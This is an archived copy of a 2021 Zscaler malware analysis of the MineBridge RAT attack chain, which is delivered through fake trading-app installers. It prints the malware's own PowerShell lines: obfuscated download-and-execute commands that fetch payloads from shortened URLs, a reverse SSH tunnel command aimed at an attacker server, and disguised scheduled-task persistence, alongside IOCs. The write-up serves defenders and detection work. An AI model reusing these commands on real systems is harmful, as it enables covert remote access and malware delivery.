{
	"id": "279297a7-6b2e-4d8a-bb68-e40c5d87ed55",
	"created_at": "2026-04-06T00:17:14.739625Z",
	"updated_at": "2026-04-10T13:12:44.376633Z",
	"deleted_at": null,
	"sha1_hash": "9be23126e184a79db12308cedfdfad62af23aa72",
	"title": "Demystifying the full attack chain of MineBridge RAT | Zscaler",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1448364,
	"plain_text": "Demystifying the full attack chain of MineBridge RAT | Zscaler\r\nBy Sudeep Singh, Sahil Antil\r\nPublished: 2021-06-24 · Archived: 2026-04-05 16:23:05 UTC\r\nIntroduction\r\nIn March 2021, threat actors started distributing MineBridge RAT with an updated distribution mechanism.\r\nMorphisec blogged about the partial attack chain of this new attack but they could not find the origin or initial\r\nstages of the attack chain.\r\nIn May 2021, Zscaler ThreatLabz was able to uncover all the components of this complex multi-stage attack chain,\r\nwhich had never before been documented in their entirety in the public domain.\r\nWe've blogged about MineBridge RAT before, in February 2021. This is a RAT (remote access trojan) that\r\nmisuses the remote desktop software TeamViewer for DLL side-loading, enabling the threat actor to take a wide\r\narray of remote follow-on actions such as spying on users or deploying additional malware. It was first discovered\r\nin January 2020 targeting financial services organizations.\r\nWe discovered that the threat actors are now distributing MineBridge RAT through Windows Installer binaries\r\nwhich masquerade as trading applications. 
The different stages in this sophisticated attack chain leverage\r\nWindows scheduled tasks, PowerShell scripts, reverse SSH tunnels, legitimate binaries such as TeamViewer, and\r\nshortened URLs that ultimately lead to the MineBridge RAT execution.\r\nAttack flow\r\nFigure 1 below illustrates the full end-to-end attack chain.\r\nhttps://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat\r\nPage 1 of 11\n\nFigure 1: Complete end-to-end attack chain used to deliver MineBridge RAT\r\nTechnical analysis\r\nOn April 9th, 2021, threat actors registered the domain \"tradingview[.]cyou,\" a look-alike of the legitimate\r\nwebsite \"tradingview[.]com.\"\r\nA download link for the malicious TradingView Desktop application was placed on the homepage.\r\nThe official TradingView desktop application was launched by tradingview.com in December 2020 for the first\r\ntime. This indicates that the threat actor is quick to identify such opportunities and leverage them in their attack\r\nchain. Within 4 months of the launch of the new official trading application, the threat actor registered a new domain\r\nto distribute the malicious version of the application.\r\nSimilarly, other trading applications and bots often used by stock and cryptocurrency traders have also been\r\nabused by the threat actor. 
The complete list of file hashes is included in the IOCs section.\r\nFigures 2 and 3 below show the webpages corresponding to the malicious and legitimate domains.\r\nFigure 2: Webpage of the malicious website\r\nFigure 3: Webpage of the legitimate website\r\nThe download link (hxxps://tradingview[.]cyou/tradeview.php) on the attacker-controlled domain leads to the\r\ndownload of a malicious Windows Installer.\r\nNote: We noticed that the download URL responds with the malicious Windows Installer only if the user-agent\r\nstring in the HTTP request headers corresponds to the Windows 10 OS.\r\nFor the purpose of technical analysis, we will look at the Windows Installer with MD5 hash:\r\n4284ee1eef9dd7f020f5002d63def278\r\nThe installer is an Inno package which masquerades as a TradingView Desktop application and is digitally signed\r\nby YUNIVELL, LLC. The thumbprint of the digital signature is: 93e9d0b1ea812672b825d7c6812d435cca9fff99\r\nFigure 4 below shows the content of the Inno package.\r\nFigure 4: Contents of the Inno setup package\r\nBy pivoting on this thumbprint, we identified a few more trading applications which are used to spread\r\nMineBridge RAT as well. The hashes of these binaries are also listed in the Indicators of compromise\r\n(IOCs) section.\r\nUpon execution, this installer shows a GUI (Graphical User Interface) which spoofs a TradingView application\r\nwhile it performs malicious activities in the background.\r\nTo start the malicious activities, the installer executes two PowerShell command lines, which we refer to as\r\nStage-1 PowerShell and Stage-2 PowerShell. 
The operations performed by these are explained in detail in the\r\nfollowing sections.\r\n[+] Stage-1 PowerShell\r\nFigure 5 below shows the relevant code section of the Stage-1 PowerShell script.\r\nFigure 5: Stage-1 PowerShell code\r\nBelow are the main operations performed by it.\r\n1. Changes the current directory to: \"$env:programdata\\ssh\\\"\r\n2. Fetches the sshd configuration from the shortened URL: https://cutt[.]ly/UxtdKtn (redirects to: https://cloud-check[.]website/online/tunupd.php?f=cfg) and writes it to the file: sshd_config\r\n3. Adds the OpenSSH.Server Windows capability and starts the sshd service. Sets the startup type to Automatic.\r\n4. Changes directory to the path: \"$env:userprofile\" and creates the \".ssh\" directory.\r\n5. Fetches the SSH keys from the URL: https://cutt[.]ly/Zxtd1Kl (redirects to: https://cloud-check[.]website/online/tunupd.php?f=key) and writes them to the file: authorized_keys\r\n6. Fetches the RSA private keys from the URL: https://cutt[.]ly/yxtdOo3 (redirects to: https://cloud-check[.]website/online/tunupd.php?f=rsa) and writes them to the file: tun_id_rsa\r\n7. Downloads the SSH client binary from the URL: https://cutt[.]ly/ubfAKPb (redirects to: https://cloud-check[.]website/online/tunupd.php?f=ssh) and writes it to: ssh.exe\r\n8. 
Executes the following command to set up a reverse SSH tunnel from the victim’s machine at port 109 to the\r\nattacker’s server at port 32672.\r\n-N -R '+$RemotePort+':localhost:109 tun@'+$RemoteSrv+' -i \"'+$env:userprofile+'\\.ssh\\tun_id_rsa\" -o\r\n\"StrictHostKeyChecking=no\" -o \"ExitOnForwardFailure=yes\" -o \"ServerAliveInterval=10\" -o\r\n\"ServerAliveCountMax=10\"';\r\nHere,\r\n$RemoteSrv: 86[.]106[.]181[.]183\r\n$RemotePort: 32672\r\nNote: Reverse SSH tunnelling helps the threat actor bypass firewall rules, since outbound connection requests\r\nare generally not blocked.\r\n9. Creates a new scheduled task with the name \"OneDrive Sync\" which executes the above command line upon\r\nlogon, and once every 20 minutes.\r\n[+] Stage-2 PowerShell\r\nFigure 6 below shows the relevant code section of the Stage-2 PowerShell script.\r\nFigure 6: Stage-2 PowerShell code\r\nThe PowerShell script performs the following operations:\r\n1. Creates a scheduled task with the name \"Google Disk Sync\" which runs twice every week and executes the\r\nfollowing code using PowerShell:\r\n$b=\"https://\";\r\n$c=\"cutt[.]ly\";\r\n$d=\"/9nOFUuK\";\r\n$b+=$c;\r\n$b+=$d;\r\n$a=iwr $b -UseBasicPArsing |iex;\r\n$b=\"https://\";\r\n$c=\"cutt[.]ly\";\r\n$d=\"/HxPcxuH\";\r\n$b+=$c;\r\n$b+=$d;\r\n$a=iwr $b -UseBasicPArsing |iex;\r\nThis code performs the following operations:\r\n● Downloads and executes Stage-3 PowerShell code from: cutt[.]ly/9nOFUuK [redirects to:\r\nhttps://simpleclub[.]website/upd/?t=psns] which ultimately leads to NetSupport client execution.\r\n● Downloads and executes Stage-4 PowerShell code from: cutt[.]ly/HxPcxuH [redirects to:\r\nhttps://simpleclub[.]site/upd/?t=pstv] which ultimately leads to MineBridge RAT execution.\r\n2. 
Creates a scheduled task with the name \"Google Photo Sync\" which runs twice every week and executes the\r\nfollowing PowerShell command line:\r\n$b=\"https://\";\r\n$c=\"cutt[.]ly\";\r\n$d=\"/9nOFUuK\";\r\n$b+=$c;\r\n$b+=$d;\r\n$a=iwr $b -UseBasicPArsing |iex;\r\nThis again downloads and executes the Stage-3 PowerShell code from: https://cutt[.]ly/9nOFUuK [redirects to:\r\nhttps://simpleclub[.]website/upd/?t=psns]\r\nNote: We have not detailed the Stage-3 PowerShell and Stage-4 PowerShell in this blog since the details for these\r\ntwo are already covered in the Morphisec blog.\r\nZscaler Cloud Sandbox report\r\nFigure 7 below shows the Zscaler cloud sandbox report for the MineBridge RAT DLL.\r\nFigure 7: Cloud sandbox report\r\nIn addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various\r\nlevels.\r\nPS.Downloader.MINEBRIDGE\r\nWin32.Backdoor.MINEBRIDGE\r\nMITRE ATT\u0026CK TTP Mapping\r\nID | Technique | Description\r\nT1566 | Phishing | Attacker-hosted fake websites leading to malicious file download\r\nT1204.002 | User Execution: Malicious File | User executes the downloaded file\r\nT1059.001 | Command and Scripting Interpreter: PowerShell | Uses PowerShell in multiple stages to download and execute malicious payloads\r\nT1547.001 | Registry Run Keys / Startup Folder | Creates LNK file in the startup folder for payload execution\r\nT1053.005 | Scheduled Task/Job: Scheduled Task | Creates scheduled tasks to execute PowerShell commands which further download and execute PowerShell scripts\r\nT1140 | Deobfuscate/Decode Files or Information | Strings and other data are obfuscated in the payloads\r\nT1036.004 | Masquerading: Masquerade Task or Service | Scheduled tasks are created with names masquerading as Google and OneDrive\r\nT1036.005 | Masquerading: Match Legitimate Name or Location | Dropped LNK file for persistence masquerades as Windows Defender\r\nT1027.002 | Obfuscated Files or Information: Software Packing | Payloads are packed in layers\r\nT1574.002 | Hijack Execution Flow: DLL Side-Loading | Uses a legitimate TeamViewer binary with a DLL side-loading vulnerability\r\nT1056.002 | Input Capture: GUI Input Capture | Captures TeamViewer-generated UserID and Password by hooking GUI APIs\r\nT1057 | Process Discovery | Verifies the name of the parent process\r\nT1082 | System Information Discovery | Gathers system OS version info\r\nT1033 | System Owner/User Discovery | Gathers currently logged-in username\r\nT1572 | Protocol Tunneling | Creates reverse SSH tunnel\r\nT1071.001 | Application Layer Protocol: Web Protocols | Uses HTTPS for network communication\r\nT1041 | Exfiltration Over C2 Channel | Data is exfiltrated using the existing C2 channel\r\nIndicators of compromise (IOCs)\r\n[+] Hashes\r\nMD5 | FileName | Type\r\n4284ee1eef9dd7f020f5002d63def278 | TradingView.exe | Installer\r\n68a010a3d0d25cfa13933199511ed897 | Polarr_Setup (2).exe | Installer\r\nffcd63dc98e64afbfea8718b747963d7 | Bitcoin_Trade.exe | Installer\r\n3281f3b30fb8f3c69b18cc7aadfdf697 | Arbitrage_Bot.exe | Installer\r\n796e091b18112e223749972c3f0888db | Bitcoin_Trade.exe | Installer\r\nb14632304a7543752fbf2e3b7c0eca59 | msi.tiff (MineBridge RAT) | Dll\r\n[+] C2 domains\r\nComponent: Domain(s)\r\nPhishing website: tradingview[.]cyou, tradingview[.]cloud, tradingview[.]digital, tradingview[.]life\r\nPowerShell payloads: cloud-check[.]website, simpleclub[.]website, simpledomen[.]website, simpleclub[.]site\r\nReverse SSH tunnel: 86.106.181[.]183:32672\r\nNetSupport client: update-system[.]cn, updatesystem[.]website\r\nMineBridge RAT: 
ninjakick[.]club, polarrsearch[.]xyz, rogaikopyta[.]xyz, utkailipa[.]xyz, 5tvstar[.]cn, goldendragon888[.]cn\r\n[+] Windows Installer signer details\r\nSigner name: YUNIVELL, LLC\r\nThumbprint: 93E9D0B1EA812672B825D7C6812D435CCA9FFF99\r\n[+] Scheduled task names\r\nOneDrive sync\r\nGoogle Disk Sync\r\nGoogle Photo Sync\r\nSource: https://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat"
	],
	"report_names": [
		"demystifying-full-attack-chain-minebridge-rat"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434634,
	"ts_updated_at": 1775826764,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9be23126e184a79db12308cedfdfad62af23aa72.pdf",
		"text": "https://archive.orkl.eu/9be23126e184a79db12308cedfdfad62af23aa72.txt",
		"img": "https://archive.orkl.eu/9be23126e184a79db12308cedfdfad62af23aa72.jpg"
	}
}